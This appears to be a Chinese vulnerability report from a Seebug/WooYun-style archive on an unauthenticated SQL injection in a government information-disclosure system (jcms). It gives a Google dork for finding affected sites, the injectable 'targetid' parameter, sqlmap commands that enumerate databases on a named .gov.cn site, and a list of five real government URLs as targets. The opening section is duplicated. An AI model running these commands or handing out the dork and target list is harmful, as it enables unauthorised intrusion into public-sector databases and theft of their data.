VULHUB ™

### 简要描述： 某政府大量使用信息公开系统SQL注射 ### 详细说明： 该系统被大量使用，Google关键字: inurl:/xxgk/jcms_files [<img src="https://images.seebug.org/upload/201503/04225155c57cb3c3ee17ff49a418c1f5b6959ab7.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/04225155c57cb3c3ee17ff49a418c1f5b6959ab7.jpg) /xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1 无需登录，targetid存在注入 ### 漏洞证明： ``` Microsoft Windows [版本 6.1.7601] 版权所有 (c) 2009 Microsoft Corporation。保留所有权利。 C:\Users\Administrator>sqlmap.py -u "http://xxgk.qingzhou.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1" ``` [<img src="https://images.seebug.org/upload/201503/042257469253dd43afaf2bcf4faf4da945ae9f87.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/042257469253dd43afaf2bcf4faf4da945ae9f87.jpg) ``` Microsoft Windows [版本 6.1.7601] 版权所有 (c) 2009 Microsoft Corporation。保留所有权利。...

### 简要描述： 某政府大量使用信息公开系统SQL注射 ### 详细说明： 该系统被大量使用，Google关键字: inurl:/xxgk/jcms_files [<img src="https://images.seebug.org/upload/201503/04225155c57cb3c3ee17ff49a418c1f5b6959ab7.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/04225155c57cb3c3ee17ff49a418c1f5b6959ab7.jpg) /xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1 无需登录，targetid存在注入 ### 漏洞证明： ``` Microsoft Windows [版本 6.1.7601] 版权所有 (c) 2009 Microsoft Corporation。保留所有权利。 C:\Users\Administrator>sqlmap.py -u "http://xxgk.qingzhou.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1" ``` [<img src="https://images.seebug.org/upload/201503/042257469253dd43afaf2bcf4faf4da945ae9f87.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/042257469253dd43afaf2bcf4faf4da945ae9f87.jpg) ``` Microsoft Windows [版本 6.1.7601] 版权所有 (c) 2009 Microsoft Corporation。保留所有权利。 C:\Users\Administrator>sqlmap.py -u "http://xxgk.qingzhou.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1" --dbs ``` [<img src="https://images.seebug.org/upload/201503/042258347fb3b987d146ca87e2abbfb9d3f63e58.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/042258347fb3b987d146ca87e2abbfb9d3f63e58.jpg) 案例非常多，随便选取Google搜索结果的第一页的头5个： ``` http://xxgk.qingzhou.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1 http://xxgk.taixing.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1 http://www.xxgk.lg.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1 http://zfxxgk.zj.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1 http://www.jinhua.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1 ```